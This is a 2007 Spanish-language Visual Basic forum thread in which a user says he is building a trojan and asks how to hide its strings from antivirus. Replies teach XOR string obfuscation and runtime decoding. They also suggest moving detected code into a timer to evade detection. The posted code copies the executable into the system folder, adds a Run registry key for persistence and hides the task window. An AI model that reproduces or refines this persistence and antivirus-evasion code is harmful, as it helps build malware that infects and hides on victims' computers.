elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  expliquenme como cifrar o diganme si estoy bien... porfavor
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: expliquenme como cifrar o diganme si estoy bien... porfavor  (Leído 2,636 veces)
Belial & Grimoire


Desconectado Desconectado

Mensajes: 559


Tea_Madhatter


Ver Perfil
expliquenme como cifrar o diganme si estoy bien... porfavor
« en: 20 Agosto 2007, 10:33 am »

hola

estoy leyendo por primera vez el metodo de enciptacion... y no he logrado entender bien..

a ver..

primero tengo que crear un programa que me encripte por strings .. pero que?

es acaso los codigos de mi programa.. el nombre de mi programa o que?

creo que es... los codigos de mi programa... pero mejor diganme uds...

luego tengo que crear una funcion que desencripte los codigo al ejecutarlo para que puedan ser interpretados por las computadoras y que funcione mi programa... esto es cierto o tambien me equivoco?

y si las dos son ciertas... entre mas codigo cifrado tenga, menos posibilidades de ser detectado por los antivirus es mi troyano?...

espero su respuesta

gracias  ;D

P.D. cuales son las funciones de los worm?.. o en otras palabras como funcionan?... acaso sirven para unirse a otros programas para no ser detectados tan facilmente o para que sirven...?



En línea

.                                 
~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: expliquenme como cifrar o diganme si estoy bien... porfavor
« Respuesta #1 en: 20 Agosto 2007, 12:09 pm »

Vamos a ver tu tienes que tener dos funciones. Una q enkripte y otra que desencripte. Entonces tu imaginate q tienes una cadena que es detectada por el AV, por ejemplo la de añadirse al registro. Lo que tienes que hacer es cifrar la cadena para añadirse al reg con tu funcion encriptadora, todo esto en un programa independiente, imagina q la cadena cifrada que obtienes es esto "SDFS54sdf35435216%&$%&" pues ahora desde tu worm tienes que llamar a la funcion para añadir al reg con esa cadena. Por ej, imagina q la funcion para añadir al reg se llama "Reg" y la funcion para descifrar "descifra", pues tienes que llamarla así:

Código:
Reg (descifra("SDFS54sdf35435216%&$%&"))

Citar
P.D. cuales son las funciones de los worm?.. o en otras palabras como funcionan?... acaso sirven para unirse a otros programas para no ser detectados tan facilmente o para que sirven...?

http://es.wikipedia.org/wiki/Gusano_inform%C3%A1tico


En línea

Belial & Grimoire


Desconectado Desconectado

Mensajes: 559


Tea_Madhatter


Ver Perfil
Re: expliquenme como cifrar o diganme si estoy bien... porfavor
« Respuesta #2 en: 20 Agosto 2007, 22:23 pm »

hola

Ahh.. ok..

gracias por la info... solo tengo otra duda...

se puede cifrar cualquier codigo... o no todo...

ya que intente cifrar el clasico App.TaskVisible = False pero no supe como colocarlo para que me funcionara...

Tambien intente hacer esto... pero tampoco funciona

Código:

Dim win
Dim sys
Dim residencia
ejec = App.path
If Right(ejec, 1) <> "\" Then ejec = ejec & "\"
ejec = ejec & App.EXEName & ".exe"
Set obj = CreateObject("Scripting.FileSystemObject")
Set win = obj.GetSpecialFolder(0)
Set sys = obj.GetSpecialFolder(1)
win = LCase(win)
sys = LCase(sys)
FileCopy ejec, sys & "\programa"
Name sys & "\programa" As sys & "\programa.exe"
Set residencia = CreateObject("WScript.Shell")
residencia.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "programa", sys & "\programa.exe"
App.TaskVisible = False

intente encriptarlo con un codigo que encontre... es este

Código:
Private Sub Command1_Click()
Dim TextoAux As String, Texto As String
    Dim I As Integer
    Texto = ""
    TextoAux1 = Text1.Text
    For I = 1 To Len(TextoAux1)
        Text1.SelStart = I - 1
        Text1.SelLength = 1
        TextoAux = Text1.SelText
        Texto = Texto + Chr$(Asc(TextoAux) Xor 20)
    Next I
    Text1.Text = Texto

End Sub



pero al encriptarlo no puedo hacer que se desencripte para que funcione.. intente modificarlo como lo que puse abajo y funciona para desencriptarlo, pero al ejecutarlo  ya no funciona... y esto es lo que me detecta el antivirus

Código:

"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "programa", sys & "\programa.exe"
App.TaskVisible = False

y si hago esto el codigo funciona


Código:

Private Sub Form_Load()
decrypt ("\_QMKWAFFQZ@KAGQFHG{r`cufqHY}wf{g{r`HC}zp{cgHWaffqz`Bqfg}{zHFazH64246df{sfuyu684gmg4246Hdf{sfuyu:qlq")
End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Esto:

\_QMKWAFFQZ@KAGQFHG{r`cufqHY}wf{g{r`HC}zp{cgHWaffqz`Bqfg}{zHFazH64246df{sfuyu684gmg4246Hdf{sfuyu:qlq

ES ESTO...

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "programa", sys & "\programa.exe

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Private function decrypt(text2  as string)
Dim TextoAux As String, texto As String
    Dim I As Integer
    texto = ""
    Text1.Text = text2
    textoaux1 = Text1.Text
    For I = 1 To Len(textoaux1)
        Text1.SelStart = I - 1
        Text1.SelLength = 1
        TextoAux = Text1.SelText
        texto = texto + Chr$(Asc(TextoAux) Xor 20)
    Next I
text1.text = texto
End Function


y no se si tenga que kedar asi...

Código:
Private function decrypt(text2  as string)
Dim TextoAux As String, texto As String
    Dim I As Integer
    texto = ""
    Text1.Text = text2
    textoaux1 = Text1.Text
    For I = 1 To Len(textoaux1)
        Text1.SelStart = I - 1
        Text1.SelLength = 1
        TextoAux = Text1.SelText
        texto = texto + Chr$(Asc(TextoAux) Xor 20)
    Next I
Dim win
Dim sys
Dim residencia
ejec = App.path
If Right(ejec, 1) <> "\" Then ejec = ejec & "\"
ejec = ejec & App.EXEName & ".exe"
Set obj = CreateObject("Scripting.FileSystemObject")
Set win = obj.GetSpecialFolder(0)
Set sys = obj.GetSpecialFolder(1)
win = LCase(win)
sys = LCase(sys)
FileCopy ejec, sys & "\programa"
Name sys & "\programa" As sys & "\programa.exe"
Set residencia = CreateObject("WScript.Shell")
residencia.RegWrite texto
app.taskvisibe= false


pero al ejecutarlo... no funciona... alguien sabe porke?
En línea

.                                 
~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: expliquenme como cifrar o diganme si estoy bien... porfavor
« Respuesta #3 en: 21 Agosto 2007, 02:00 am »

Eso no lo puedes cifrar  :P Lo q se encriptan son las cadenas, lo q va entre " "  :xD :xD
Si el AV te detecta eso, ponlo en un timer con intervaleo 1 en vez de en el form load y veras como no te lo detecta ;)
En línea

HaDeS, -
WarZone Master

Desconectado Desconectado

Mensajes: 284



Ver Perfil WWW
Re: expliquenme como cifrar o diganme si estoy bien... porfavor
« Respuesta #4 en: 21 Agosto 2007, 02:09 am »

Código
  1. Private Sub Command1_Click()
  2. Dim TextoAux As String, Texto As String
  3.    Dim I As Integer
  4.    Texto = ""
  5.    TextoAux1 = Text1.Text
  6.    For I = 1 To Len(TextoAux1)
  7.        Text1.SelStart = I - 1
  8.        Text1.SelLength = 1
  9.        TextoAux = Text1.SelText
  10.        Texto = Texto + Chr$(Asc(TextoAux) Xor 20)
  11.    Next I
  12.    Text1.Text = Texto
  13.  
  14. End Sub
  15.  


Ese sub lo podes traducir a la funcion cifra como
Código
  1. Private Function Destripa(Texto As String) As String
  2. Dim Texto2$
  3. For i = 1 To Len(Texto)
  4.    Texto2 = Texto2 & Chr$(Asc(Mid(Texto, i, 1)) Xor 20)
  5. Next i
  6. Destripa= Texto2
  7. End Function
  8.  

A lo que
Código
  1. residencia.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "programa", sys & "\programa.exe"
  2.  

vendria siendo
Código
  1. residencia.RegWrite Destripa("\_QMKWAFFQZ@KAGQFHG{r`cufqHY}wf{g{r`HC}zp{cgHWaffqz`Bqfg}{zHFazH") & Destripa("df{sfuyu"), sys & Destripa("Hdf{sfuyu:qlq")
  2.  

Una pregunta
Código
  1. "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "programa"
  2.  
Porque no unes esas dos cadenas ?, o acaso programa es una variable ?

Saludos :P
« Última modificación: 21 Agosto 2007, 02:11 am por HaDeS, - » En línea

Belial & Grimoire


Desconectado Desconectado

Mensajes: 559


Tea_Madhatter


Ver Perfil
Re: expliquenme como cifrar o diganme si estoy bien... porfavor
« Respuesta #5 en: 21 Agosto 2007, 20:54 pm »

hola

jeje.. tienen razon, solamente lo que va entre " "  es lo que se puede cifrar....

y ya lo intente y ya logre solucionarlo...

y la funcion de hades.. esta mas simple... voy aver que tal me va...

gracias por la ayuda   ;D
En línea

.                                 
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
No me funciona bien ubuntu ! ayuda porfavor « 1 2 »
GNU/Linux
razalas89 10 6,520 Último mensaje 22 Enero 2012, 23:48 pm
por Paul Young
Expliquenme bien lo que se hace aqui !
Ingeniería Inversa
TrashAmbishion 5 3,469 Último mensaje 10 Agosto 2013, 10:53 am
por karmany
¿Cómo saber si estoy invirtiendo bien en una agencia web?
Diseño Gráfico
RJ-43 0 2,246 Último mensaje 6 Febrero 2019, 01:13 am
por RJ-43
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines